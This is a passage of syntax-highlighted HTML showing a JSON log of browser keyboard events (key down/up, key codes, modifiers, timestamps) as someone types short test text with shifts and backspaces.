class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4006.31</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">4006.645</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4093.055</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4093.26</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4124.945</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4125.22</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4205.245</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4205.5</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4228.57</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4228.805</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4292.885</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span 
class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4293.13</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4356.695</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4356.945</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4428.73</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4428.94</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4452.825</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4453.04</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4573.065</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4573.295</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">4628.565</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4628.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4660.975</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4661.235</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4716.515</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4716.765</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4732.9</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4733.135</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4796.565</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4796.795</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span 
class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4836.63</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4836.865</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5133.195</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5133.39</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5228.89</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5229.14</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5284.76</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5284.995</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5285.655</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">5286.12</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5364.66</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5364.885</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5365.44</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5365.755</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span 
class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5829.575</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5829.815</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5830.415</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5884.835</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5885.03</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span 
class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5885.485</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5964.7</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5964.9</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5965.36</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span 
class="p">,</span><span class="mf">6037.525</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6049.935</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6050.42</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6118.395</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6118.635</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span 
class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6119.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6421.105</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6421.315</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6421.935</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6591.365</span><span class="p">],[</span><span class="s2">"kd"</span><span 
class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6591.63</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6599.805</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"N"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6700.895</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"N"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6701.105</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"N"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">6701.52</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6750.675</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6750.89</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6751.485</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6812.715</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span 
class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6812.935</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6813.345</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6876.985</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6877.215</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6877.625</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span 
class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7028.745</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7029</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7029.53</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7284.965</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span 
class="mf">7285.195</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7285.65</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7340.71</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7351.655</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7352.085</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
